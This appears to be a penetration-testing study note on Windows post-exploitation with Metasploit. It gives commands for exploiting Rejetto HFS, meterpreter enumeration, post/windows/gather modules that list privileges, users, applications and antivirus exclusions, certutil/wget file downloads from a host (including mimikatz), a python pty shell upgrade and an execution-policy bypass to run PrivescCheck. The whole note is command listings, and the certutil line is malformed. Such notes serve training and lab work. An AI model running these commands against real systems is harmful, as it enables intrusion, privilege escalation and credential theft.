Post Exploitation Overview

Post Exploitation Overview

Navigation

Sections in This Note


Windows Post Exploitation

MSF provides post-exploitation modules for enumerating info about a Windows system:

service postgresql start
msfconsole
workspace -a windows_post
setg RHOSTS (IPaddress)
db_nmap -sV (IPaddress)

# (consider the target has rejetto vuln)
use exploit/windows/http/rejetto_hfs_exec
run

Additional commands after getting the meterpreter:

help                    # additional commands
screenshot              # takes screenshot, saves in PWD
getuid
show_mount              # shows storage details
ps                      # process list
use post/windows/manage/migrate   # migrate to a session

Post exploitation modules:

use post/windows/gather/win_privs
set SESSION 1
run
# (shows what privileges we have and don't)

use post/windows/gather/enum_logged_on_users
set session 1
run
# (list currently logged on users and previously logged in users)

use post/windows/gather/checkvm
set SESSION 1
run
# (check whether the target is running in a virtual machine)

use post/windows/gather/enum_applications
set SESSION 1
run
# (list applications and programs on the target machine)

use post/windows/gather/enum_av_excluded
set SESSION 1
run
# (list the antivirus specified on the target)

Transfer Files To and From Target

# Python 2
python -m SimpleHTTPServer 80

# Python 3
python3 -m http.server 80

# Windows
certutil -urlcache -f http://mimikatz.exe mimikatz.exe

# Linux
wget http://192.196.45.2/test.txt

Upgrading Shell

/bin/bash -i
python -c 'import pty; pty.spawn("/bin/bash")'

Enumerating System Information

getuid
sysinfo
shell        # to open a shell
hostname
systeminfo

Migrated from Unsorted Notes — Enumerating Users and Groups

Enumerating Users and Groups

msfconsole
use post/windows/gather/enum_logged_on_users
set session 1
run

Migrated from Unsorted Notes — Enumerating Network Info

Enumerating Network Info

ipconfig
netstat -aon     # services running
netsh firewall show state

Migrated from Unsorted Notes — Identify Privilege Escalation Vulnerabilities

Identify Privilege Escalation Vulnerabilities

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Powered by Forestry.md